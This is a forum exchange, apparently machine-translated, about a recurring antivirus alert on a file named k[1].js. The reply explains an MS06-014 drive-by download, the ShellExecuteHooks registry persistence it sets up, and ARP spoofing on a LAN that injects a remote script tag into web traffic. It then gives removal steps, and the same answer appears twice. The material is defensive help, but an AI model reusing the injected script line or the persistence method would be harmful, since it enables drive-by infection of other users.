Script virus: (file name is k[1].js) always appears in temporary Internet files, Rising surveillance kills and comes again, and this is repeated! I tried to clear the temporary file, but once I opened the web page (regardless of which web pages), the k[1].js will be monitored by Rising again. What's going on? Is it a false alarm?
This web page takes advantage of the MS06-014 vulnerability, download http://day./ to C:\WINDOWS\, and write it directly to the registry
Code:
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}Point to C:\WINDOWS\
Because Rising was investigated and killed, under normal circumstances, everyone will not be poisoned. However, the repeated poison response is:
A computer in the LAN is infected with this poison, and then launches an ARP attack on other computers in the LAN to add network data packets received by other users.
Code:
<script src="http://k./" type="text/javascript"></script>
The code of the user causes other users to report poison when visiting any website.
So, first, confirm whether your computer is poisoned:
Confirm whether the following registry path exists:
Code:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
If present, try to delete both registry paths in safe mode.
If it does not exist, it means it is not because of your poisoning problem, but because you are attacked by ARP.
In this case, please contact the LAN network management for coordination. You must find a computer that was poisoned and cheated on ARP, and then disconnect it from the Internet to check for the poison.
This web page takes advantage of the MS06-014 vulnerability, download http://day./ to C:\WINDOWS\, and write it directly to the registry
Code:
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}Point to C:\WINDOWS\
Because Rising was investigated and killed, under normal circumstances, everyone will not be poisoned. However, the repeated poison response is:
A computer in the LAN is infected with this poison, and then launches an ARP attack on other computers in the LAN to add network data packets received by other users.
Code:
<script src="http://k./" type="text/javascript"></script>
The code of the user causes other users to report poison when visiting any website.
So, first, confirm whether your computer is poisoned:
Confirm whether the following registry path exists:
Code:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
If present, try to delete both registry paths in safe mode.
If it does not exist, it means it is not because of your poisoning problem, but because you are attacked by ARP.
In this case, please contact the LAN network management for coordination. You must find a computer that was poisoned and cheated on ARP, and then disconnect it from the Internet to check for the poison.